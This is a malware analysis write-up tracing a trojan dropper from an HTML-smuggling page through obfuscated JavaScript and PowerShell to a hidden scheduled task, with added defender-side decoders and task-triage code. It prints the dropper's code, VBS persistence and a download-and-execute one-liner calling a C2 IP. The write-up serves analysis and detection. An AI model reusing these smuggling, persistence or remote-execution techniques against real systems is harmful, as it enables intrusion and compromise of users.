Generic Trojan Dropper
STAGE 1:
`064ee9cc4256a4e004d3c6e74e1a4cc2d686f82a7e22640aa718167b5af40a29 ./sample.html `
This is an HTML file containing the JavaScript code that drops a zip file. The encrypted payload sits in the body section, inside an element with id `jzasjnpc` and class `bwkytcnl`.
This is the encrypted zip file. It is first decoded from base64, then XORed, and then base64-decoded again.
The XOR key for this zip payload is `so83fnguk42vuluw82syq55zhqqf3qm9sznw3skkxdfbcj2fjy1zbi6t4wn89m8kafg1kvi04dppc1q5xye8zzxo4k6utjrwwsc2f59khfmzkvycg8qxwl36asncitbj`.
```html
<body>
<main class="bwkytcnl" id="jzasjnpc" data="JipLdyQsNjEqdXM/NCo/QEleEiA9UUYjQzcGJ3IhB3AyOy8ScjIqKiwzIFcuPnMSJxNwAy8QBz5WGTROWDp2By0zNUcyRT9kVTMUBS9cAU8uM....
```
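An analyst-side decoder for the chain described above (base64, then XOR with the quoted key, then base64 again), as an added example; it is not code from the sample. The XOR key is the one quoted in this write-up; the HTML and the archive bytes are constructed fixtures, since the real `data` attribute is truncated here, and the `build_fixture` helper only exists to produce an input the decoder can run against.

```python
import base64
import re

# XOR key quoted in the write-up for this sample's stage-1 payload.
XOR_KEY = b"so83fnguk42vuluw82syq55zhqqf3qm9sznw3skkxdfbcj2fjy1zbi6t4wn89m8kafg1kvi04dppc1q5xye8zzxo4k6utjrwwsc2f59khfmzkvycg8qxwl36asncitbj"


def xor_bytes(data, key):
    """Repeating-key XOR: the middle layer of the base64 -> XOR -> base64 chain."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_data_attribute(html):
    """Pull the data="..." attribute from the <main> element that carries the payload."""
    m = re.search(r'<main\b[^>]*\sdata="([^"]*)"', html)
    if not m:
        raise ValueError("no <main ... data=...> element found")
    return m.group(1)


def decode_smuggled_payload(data_attr, key=XOR_KEY):
    """Reverse the chain the write-up describes: base64-decode, XOR, base64-decode."""
    layer1 = base64.b64decode(data_attr)
    layer2 = xor_bytes(layer1, key)
    return base64.b64decode(layer2)


def looks_like_zip(blob):
    """Quick sanity check on the recovered bytes: zip archives start with the PK signature."""
    return blob[:2] == b"PK"


def build_fixture(payload, key=XOR_KEY):
    """Constructed test input only: applies the chain forward so the decoder has something to run on."""
    inner = base64.b64encode(payload)
    return base64.b64encode(xor_bytes(inner, key)).decode("ascii")


# Constructed sample, not the real smuggled archive.
SAMPLE_ZIP = b"PK\x03\x04" + b"constructed placeholder archive body"
SAMPLE_HTML = (
    '<body>\n<main class="bwkytcnl" id="jzasjnpc" data="%s"></main>\n</body>'
    % build_fixture(SAMPLE_ZIP)
)

if __name__ == "__main__":
    recovered = decode_smuggled_payload(extract_data_attribute(SAMPLE_HTML))
    print("zip signature present:", looks_like_zip(recovered), "-", len(recovered), "bytes")
```

Run it against a saved copy of the page by replacing `SAMPLE_HTML` with the file contents; if the output does not start with `PK`, the key or the layer order is wrong for that sample.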
The name of the zip file is `May10-2023-Invoice-DocuSign.zip`.
This is the procedure that generates the zip file; at the end, that object is executed (the download link is clicked):
```javascript
// Identifiers were renamed by the analyst. In the sample, properties such as
// this[array], this[Uint8Array], this[blob] and this[file] are string-keyed
// lookups on the global object (the quotes are dropped in this transcription),
// and the literal 512 in the signature is the chunk size.
function extract_zip(input_url_var, 512)
{
  var array_new = [];
  var fromb64input_data = atob_fromB64(input_url_var);      // base64-decode the data attribute
  for(var i = 0; i < fromb64input_data.length; i += 512)    // walk the decoded string in 512-byte chunks
  {
    var sliced = fromb64input_data.slice(i, i + 512);
    var sliced_array = new this[array](sliced.length);
    for(var i = 0; i < sliced.length; i++)                   // copy each character's byte value
    {
      sliced_array[i] = sliced.charCodeAt(i);
    }
    var out_zip = new this[Uint8Array](sliced_array);        // typed-array view of the chunk
    array_new.push(out_zip);
  }
  var zip_data = new this[blob](array_new, {type: octet/stream});   // assemble the chunks into a Blob
  return zip_data;
}
function zip_create(zip_data)
{
  let zip_name = "May10-2023-Invoice-DocuSign" + ".zip";
  let file_obj = new this[file]([zip_data], zip_name, {type: application/zip});
  let file_obj_url = this[URL][createObjectURL](file_obj);  // in-memory object URL for the archive
  var createElement_a = document.createElement("a");        // anchor used to trigger the download
  document.body.appendChild(createElement_a);
  createElement_a.setAttribute(href,file_obj_url);
  createElement_a[download] = zip_name;
  createElement_a.click();                                  // the browser saves the zip with no network fetch
  this[URL][revokeObjectURL](file_obj_url);
}
```
STAGE 2:
`a36c8ea0188ddc3ed8f06c8e352bb314bc222fef6f9baeb211cd97ac62462dec May10-2023-Invoice-DocuSign.zip`
This zip file contains a JavaScript file.
`44737c01c93b96afcbb96c0b38993594d29a0a07d625999ef503c8424da90b0e ./May10-2023-Invoice-DocuSign.js`
This JavaScript file contains 4 strings. After concatenating them, removing the "s" and "V" characters, and converting from hex, we get another JavaScript. This is the procedure for that:
```javascript
// STR_4 holds the concatenation of the four strings; the regex strips the "s" and "V" junk characters
temp = STR_4.replace(/[sV]/g,'');
var ooqajrjz = "";
for (var i=0;i<temp.length;i+=2)
{
  ttjqepbj = temp.substr(i,2);                               // one hex byte
  ooqajrjz += str_from_char_code(kmbvxuoa(ttjqepbj, 16));   // radix-16 conversion, then char code to string (names renamed by the analyst)
}
```
STAGE 3:
This JavaScript produces a PowerShell script that is run after 10 seconds of sleep. The PowerShell script is split by "!" and converted from base64.
```javascript
var payload = ' < payload string > '                       // base64 blob, not reproduced in this write-up
var split_payload = xhhwtarcadepz(payload).split('!');     // base64-decode, then split into fields on "!"
Win = new this[split_payload[4]](split_payload[1]);        // constructor name and its argument come from the decoded fields
Win.PopUp('This document is corrupt.', 10, 'ERROR', 48);   // decoy error dialog with a 10-second timeout
var yjdednyw = new Date();
while (true) {
  WScript.Sleep(10);
  var qhchhvwd = new Date();
  if (qhchhvwd - yjdednyw > 774720) {                      // elapsed-time check, value in ms as transcribed
    Win[split_payload[3]](split_payload[2], keCarthagedf);  // method and argument from the decoded fields; this launches the PowerShell stage
    break;
  }
};
```
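The two decoding steps just described, stage 2 (concatenate, strip "s"/"V", hex-decode) and stage 3 (base64-decode, split on "!"), as one added analyst-side example; this is not code from the sample. The string fragments and the stage-3 payload are constructed fixtures (the real ones are not reproduced in the write-up), and the field names in `stage3_fields` are only labels for the indices the decoded loader uses (`[4]` is the constructor, `[1]` its argument, `[3]` the method, `[2]` the command), not names taken from the sample.

```python
import base64
import re


def stage2_unhide_script(parts, junk_chars="sV"):
    """Concatenate the string fragments, strip the junk characters, and hex-decode to text."""
    cleaned = re.sub("[%s]" % re.escape(junk_chars), "", "".join(parts))
    if len(cleaned) % 2:
        raise ValueError("odd hex length after junk removal; check the junk-character set")
    # parseInt(pair, 16) + String.fromCharCode(...) in the sample maps each byte to one character
    return bytes.fromhex(cleaned).decode("latin-1")


def stage3_split_payload(payload_b64, sep="!"):
    """Base64-decode the stage-3 payload string and split it into its fields."""
    return base64.b64decode(payload_b64).decode("latin-1").split(sep)


def stage3_fields(payload_b64):
    """Label the fields by the indices the decoded loader reads: [4] constructor, [1] its argument, [3] method, [2] command."""
    f = stage3_split_payload(payload_b64)
    if len(f) < 5:
        raise ValueError("expected at least 5 '!'-separated fields, got %d" % len(f))
    return {"constructor": f[4], "constructor_arg": f[1], "method": f[3], "command": f[2]}


# Constructed fixtures, not the real strings.
STAGE2_PARTS = ["7s66", "1V72", "20s613", "dV313b"]   # "var a=1;" with s/V junk inserted
STAGE3_PAYLOAD = base64.b64encode(
    b"field0!object-name!command-placeholder!method-name!constructor-name"
).decode("ascii")

if __name__ == "__main__":
    print(repr(stage2_unhide_script(STAGE2_PARTS)))
    print(stage3_fields(STAGE3_PAYLOAD))
```

For a real sample, paste the four strings into `STAGE2_PARTS` in the order the script concatenates them; the odd-length check is the quickest way to notice that the junk-character set differs from "s"/"V" in a variant.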
STAGE 4:
This PowerShell script decodes some byte arrays using XOR; these hold the information about the scheduled task.
The script writes a file to `C:\Users\<user>\AppData\Local\Microsoft\WindowsPowershell\<executingScript.vbs>`.
```powershell
# Variable names are random in the sample; PowerShell is case-insensitive, so $rERbWtRv and ${ReRBwTRV} are the same variable.
$rERbWtRv = [Convert]::FromBase64String(${isWABlOEp})      # decode the embedded VBS
$bytes = Get-Variable -ValueOnly -Name '5EVLS'
$bytes.writeallbytes.Invoke(${NynG}, ${ReRBwTRV})           # write it to disk under AppData\Local\Microsoft\WindowsPowershell
$askzpHUpAj = (pwd).ToString() + '\'
$vQpSBXgyj = &(cd $JtATCAR)
# loopFunc XOR-decodes the byte array with key 75; these 15 bytes decode to "iex (iwr -useb ", the start of the task's argument string
$tkqrmLSfPD = '"' + (loopFunc([System.Byte[]]@(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$iZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
$eRQcf = Start-Sleep -Seconds $TkQRmlsFpD                   # as transcribed; the task action is later passed through this variable
$tpNDJPwAa = New-ScheduledTaskPrincipal $UJrw
# one-minute repetition for a year (as transcribed; -Once/-At/-RepetitionInterval/-RepetitionDuration are New-ScheduledTaskTrigger parameters)
$aIufdyWasr = Register-ScheduledTask -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$dwtTAWqx = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Parallel -AllowStartIfOnBatteries   # hidden task, parallel instances allowed
Register-ScheduledTask -TaskName ${WbWmgQb} -Action ${eRQcf} -Trigger ${aIufdyWasr} -Settings ${dwtTAWqx}   # persist the task
```
The persistent VBS is merely a WScript command to run PowerShell, and it uses parameters for the C2 from the scheduled task command.
```vb
c = WScript.Arguments(0)                        ' first argument: the PowerShell one-liner passed in by the scheduled task
Set s = CreateObject("WScript.Shell")
s.Run "Powershell.exe -exec bypass" & c, 0      ' window style 0: run hidden
```
This scheduled task runs approximately every minute, and it runs that VBS script with the C2 information as arguments:
```text
C:\Users\<user>\AppData\Local\Microsoft\WindowsPowershell\<executingScript.vbs> "iex(iwr -useb http://159.65.42[.]223/r/idm/148F4423C27E506D)"
```
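Two defender-side checks for this stage, as an added example that is not part of the original write-up: decoding the XOR-obfuscated byte array from the PowerShell snippet above (byte values and key 75 taken from that snippet), and triaging an exported scheduled-task definition (`schtasks /query /xml` output) for the traits this task has: hidden, one-minute repetition, an action that runs a `.vbs` from `AppData\Local`, a download-and-execute one-liner in its arguments, and the C2 address from the IOC list. The two task XML documents are constructed fixtures modelled on what the write-up describes; the user name and the script file name in them are placeholders.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# IOC from the write-up (defanged there); refanged so it matches raw task XML.
C2_IPS = {"159.65.42[.]223".replace("[.]", ".")}

# Byte array and key taken from the write-up's PowerShell snippet.
PS_BYTE_ARRAY = [0x22, 0x2e, 0x33, 0x6b, 0x63, 0x22, 0x3c, 0x39, 0x6b, 0x66, 0x3e, 0x38, 0x2e, 0x29, 0x6b]
PS_XOR_KEY = 75


def xor_decode(values, key):
    """Single-byte XOR, the decoding the PowerShell stage applies to its byte arrays."""
    return bytes(v ^ key for v in values).decode("latin-1")


def triage_task_xml(xml_text):
    """Return a list of findings for one exported scheduled-task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    hidden = root.findtext("t:Settings/t:Hidden", default="", namespaces=TASK_NS)
    if hidden.strip().lower() == "true":
        findings.append("task is hidden")
    for interval in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
        if (interval.text or "").strip().upper() in ("PT1M", "PT60S"):
            findings.append("repeats every minute")
    for action in root.iterfind("t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS)
        args = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        line = command + " " + args
        if re.search(r"\\AppData\\Local\\.*\.vbs\b", line, re.I):
            findings.append("runs a .vbs from AppData\\Local")
        if re.search(r"\biex\s*\(\s*iwr\b", line, re.I) or "-useb" in line.lower():
            findings.append("download-and-execute one-liner in arguments")
        for ip in C2_IPS:
            if ip in line:
                findings.append("known C2 address in action: " + ip)
    return findings


# Constructed task export modelled on the write-up (placeholder user and script name).
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval><Duration>P365D</Duration></Repetition>
      <StartBoundary>2023-05-10T12:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <Hidden>true</Hidden>
  </Settings>
  <Actions>
    <Exec>
      <Command>C:\\Users\\PLACEHOLDER-USER\\AppData\\Local\\Microsoft\\WindowsPowershell\\PLACEHOLDER-SCRIPT.vbs</Command>
      <Arguments>"iex(iwr -useb http://159.65.42.223/r/idm/148F4423C27E506D)"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Repetition><Interval>PT1H</Interval></Repetition></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions><Exec><Command>C:\\Windows\\System32\\notepad.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print("decoded byte array:", repr(xor_decode(PS_BYTE_ARRAY, PS_XOR_KEY)))
    for name, xml_text in (("sample", SAMPLE_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, "->", triage_task_xml(xml_text) or ["no findings"])
```

Any one finding alone is weak (plenty of legitimate tasks are hidden or repeat every minute); the combination of a hidden, minute-interval task whose action is a script under a user-writable profile path is what makes this task stand out, and the C2 match turns a suspicion into a confirmed hit.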
IOCs
- 159.65.42[.]223:80